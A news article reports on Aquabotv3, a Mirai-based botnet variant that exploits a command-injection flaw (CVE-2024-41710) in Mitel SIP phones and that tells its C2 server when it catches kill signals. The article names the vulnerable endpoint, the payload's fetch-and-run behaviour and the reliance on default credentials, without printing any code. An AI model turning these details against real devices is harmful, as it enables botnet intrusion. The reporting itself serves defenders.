A new variant of the Mirai-based malware Aquabot is actively exploiting a vulnerability in Mitel phones to build a remote-controlled botnet, according to Akamai’s Security Intelligence and Response Team.

In case an army of office phones firing off distributed denial of service (DDoS) attacks against individuals or critical organizations isn’t concerning enough, this latest strain, dubbed Aquabotv3, apparently has a never-seen-before capability that reports back to its command-and-control server when it catches a kill signal – an attempt to terminate the malware – on an infected device.

“We haven’t seen this behavior before in a Mirai variant so perhaps it may become a new feature,” Akamai’s Kyle Lefton and Larry Cashdollar said.

“Although the true reason for this behavior has not been confirmed, this communication to the C2 could be a way for the botnet author to actively monitor the botnet’s health,” the duo wrote Tuesday.

Aquabot, which is based on the Mirai framework, allows miscreants to remotely control infected equipment, and is built for launching DDoS attacks at selected targets. This particular botnet has been around since at least November 2023, and now there are three publicly known versions of the malware.

Third time’s a charm?

Based on its analysis, Akamai determined Aquabotv3 to be a new variant, primarily due to its new functions. In addition to the typical DDoS attack capabilities, the Aquabotv3 has a function that sets up a signal handler to check for several kill signals. If any of these are sent to the malware by someone trying to remove the bot, it catches the signal, sets a flag in memory to indicate it’s been caught, and then reports back to C2. Crafty.

As of earlier this month, Aquabotv3 has been spotted exploiting CVE-2024-41710, a command injection vulnerability that affects some Mitel phones. Specifically the bug is present in the Mitel 6800, 6900, and 6900w series of SIP desk phones, including the 6970 Conference Unit, through firmware R6.4.0.HF1 (R6.4.0.136). It was patched in July last year.

The NIST CVE database entry for the flaw says it can be exploited across a network by an authenticated attacker with administrative privileges to execute arbitrary operating-system commands, giving the miscreant full root-level control over the device. Presumably the authentication requirement for exploitation isn’t a terribly high barrier as far too many owners of the phones don’t change the username and password from the defaults, allowing the equipment to be hijacked by other devices on the network using simple guesswork or brute-force.

Packetlabs’ researcher Kyle Burns, who found and reported the vulnerability to Mitel, published last August details of a proof-of-concept (PoC) attack in which a HTTP POST request to 8021xsupport.html on a vulnerable phone can overwrite a configuration file so that during its next boot, it executes commands injected by the attacker in that request.

How to catch a botnet

Months later, “Akamai SIRT detected exploit attempts targeting this vulnerability through our global network of honeypots in early January 2025 using a payload almost identical to the PoC,” Lefton and Cashdollar wrote.

The injected commands caught in Akamai’s honeypots attempts to “fetch and execute a shell script called ‘bin.sh,’ which will in turn fetch and execute Mirai malware on the target system,” they explained. And it supports several different architectures including x86 and Arm.

We asked the Akamai team about the need for authentication to exploit CVE-2024-41710, and whether it was truly necessary or an error in the description. “That could certainly be possible, but we do not have a proper way to test it against Mitel devices ourselves to confirm,” Lefton told The Register.

“Normally, an attacker could still exploit this by authenticating to the target device, which botnets often do using various default credentials,” Lefton added. “Our honeypots did not capture default creds being passed in this instance.”

In addition to the Mitel phone vulnerability, the threat intel team spotted the same Aquabot malware spreading through a Hadoop YARN remote-code execution hole; CVE-2018-17532; CVE-2023-26801; CVE-2022-31137; an Linksys E-series RCE; CVE-2018-10562; and CVE-2018-10561.

“Although the filenames differ from the straightforward ‘Aqua’ naming from the Mitel exploit attempts, the malware from these other exploits appears to be the same,” the researchers noted. ®